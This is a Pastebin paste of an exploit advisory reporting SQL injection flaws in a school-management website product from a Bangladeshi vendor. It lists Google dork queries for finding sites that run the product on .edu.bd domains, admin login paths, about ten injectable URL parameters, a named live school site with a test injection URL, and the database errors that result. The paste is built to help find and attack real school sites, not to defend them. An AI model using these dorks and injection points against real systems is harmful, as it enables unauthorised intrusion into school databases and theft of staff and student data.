KingSkrupellos

Tariqul Computer & Internet Point TcipBD SQL Injection

Jan 7th, 2019
376
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.48 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : Tariqul Computer & Internet Point TcipBD SQL Injection Vulnerability
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 08/01/2019
  7. # Vendor Homepage : tcipbd.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Developed By: Tariqul Computer & Internet Point'' site:edu.bd
  12. intext:''TARIQUL COMPUTER & INTERNET POINT'' site:edu.bd
  13. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  14. Special Elements used in an SQL Command ('SQL Injection') ]
  15. # Cyberizm Exploit Reference Link :
  16. cyberizm.org/cyberizm-tariqul-computer-internet-point-tcipbd-sql-injection.html
  17. # CXSecurity Exploit Reference Link :
  18. cxsecurity.com/issue/WLB-2019010045
  19.  
  20. ###################################################################
  21.  
  22. # Admin Panel Login Path :
  23. ************************
  24.  
  25. /admin/login.php
  26. /teacher/login.php
  27.  
  28. # SQL Injection Exploit :
  29. **********************
  30.  
  31. /teacher_details.php?link=[SQL Injection]
  32.  
  33. /employee_details.php?link=[SQL Injection]
  34.  
  35. /teacher_information.php?id=[SQL Injection]
  36.  
  37. /teacher_information.php?id=[ID-NUMBER-HERE]&cat=[SQL Injection]
  38.  
  39. /commute_details.php?link=[SQL Injection]
  40.  
  41. /commute.php?id=[SQL Injection]
  42.  
  43. /info_details.php?link=[YEAR]&id=[SQL Injection]
  44.  
  45. /t_per_details.php?date=[YEAR-MONTH-DAY][SQL Injection]
  46.  
  47. /s_details_details.php?link=[ID-NUMBER-HERE]
  48. &date=[YEAR-MONTH-DAY]&class=[SQL Injection]
  49.  
  50. /s_per_details.php?class=[ID-NUMBER-HERE]
  51. &sec=[ID-NUMBER-HERE]&date=[YEAR-MONTH-DAY][SQL Injection]
  52.  
  53. ###################################################################
  54.  
  55. # Example Vulnerable Site =>
  56. *****************************
  57.  
  58. [+] akkelpurghs.edu.bd/teacher_details.php?link=19%27
  59.  
  60. => [ Proof of Concept for SQL Inj ] => archive.vn/1PDNL
  61.  
  62. ###################################################################
  63.  
  64. # SQL Database Error :
  65. *********************
  66.  
  67. Warning: mysql_num_rows() expects parameter 1 to be resource,
  68.  
  69. boolean given in /home/tcaip/akkelpurghs.edu.bd/teacher_details.php on line 11
  70.  
  71. Warning: mysql_fetch_assoc() expects parameter 1 to be resource,
  72.  
  73. boolean given in /home/tcaip/akkelpurghs.edu.bd/s_details_details.php on line 17
  74.  
  75. ###################################################################
  76.  
  77. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  78.  
  79. ###################################################################
Advertisement
Add Comment
Please, Sign In to add comment